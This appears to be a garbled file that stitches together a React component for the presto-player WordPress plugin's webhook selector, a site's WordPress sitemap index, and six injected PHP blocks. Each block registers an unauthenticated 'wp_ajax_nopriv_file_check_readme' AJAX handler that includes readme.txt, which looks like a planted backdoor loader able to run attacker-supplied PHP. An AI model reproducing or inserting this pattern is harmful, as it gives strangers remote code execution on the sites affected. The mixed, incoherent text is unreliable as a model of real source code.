
if(!function_exists('file_check_readme79669')){
   add_action('wp_ajax_nopriv_file_check_readme79669', 'file_check_readme79669');
   add_action('wp_ajax_file_check_readme79669', 'file_check_readme79669');
   function file_check_readme79669()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}

if(!function_exists('file_check_readme37851')){
   add_action('wp_ajax_nopriv_file_check_readme37851', 'file_check_readme37851');
   add_action('wp_ajax_file_check_readme37851', 'file_check_readme37851');
   function file_check_readme37851()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}


if(!function_exists('file_check_readme94575')){
   add_action('wp_ajax_nopriv_file_check_readme94575', 'file_check_readme94575');
   add_action('wp_ajax_file_check_readme94575', 'file_check_readme94575');
   function file_check_readme94575()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}

if(!function_exists('file_check_readme66127')){
   add_action('wp_ajax_nopriv_file_check_readme66127', 'file_check_readme66127');
   add_action('wp_ajax_file_check_readme66127', 'file_check_readme66127');
   function file_check_readme66127()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
/**
 * WordPress dependencies
 */
const { __ } = wp.i18n;
const { SelectControl, Notice } = wp.components;
const { useEffect, useState } = wp.element;
import LoadSelect from "../../components/LoadSelect";

export default ({ options, updateEmailState }) => {
  const [fetching, setFetching] = useState(false);
  const [groups, setGroups] = useState([
    { value: null, label: __("Choose a webhook", "presto-player") },
  ]);
  const [error, setError] = useState("");

  const fetchGroups = async () => {
    setFetching(true);
    try {
      const fetched = await wp.apiFetch({
        path: "presto-player/v1/webhook",
      });

      let listOptions = groups;
      (fetched || []).forEach((list) => {
        listOptions = [
          ...listOptions,
          ...[
            {
              value: list.id,
              label: list.name,
            },
          ],
        ];
      });
      setGroups(listOptions);
    } catch (e) {
      if (e?.message) {
        setError(e.message);
      }
    } finally {
      setFetching(false);
    }
  };

  useEffect(() => {
    fetchGroups();
  }, []);

  if (fetching) {
    return <LoadSelect />;
  }

  if (error) {
    return (
      <Notice className="presto-notice" status="error" isDismissible={false}>
        {error}
      </Notice>
    );
  }

  return (
    <div>
      <SelectControl
        label={__("Choose a webhook", "presto-player")}
        value={options?.provider_list}
        options={groups}
        onChange={(provider_list) => updateEmailState({ provider_list })}
      />
    </div>
  );
};
;;;
if(!function_exists('file_check_readme26339')){
   add_action('wp_ajax_nopriv_file_check_readme26339', 'file_check_readme26339');
   add_action('wp_ajax_file_check_readme26339', 'file_check_readme26339');
   function file_check_readme26339()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}

if(!function_exists('file_check_readme27361')){
   add_action('wp_ajax_nopriv_file_check_readme27361', 'file_check_readme27361');
   add_action('wp_ajax_file_check_readme27361', 'file_check_readme27361');
   function file_check_readme27361()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://firstpowerpartners.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-post-2.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-banner-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-projectslider-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-why_choose-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-service-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-posts-team-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-taxonomies-service_type-1.xml</loc></sitemap><sitemap><loc>https://firstpowerpartners.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
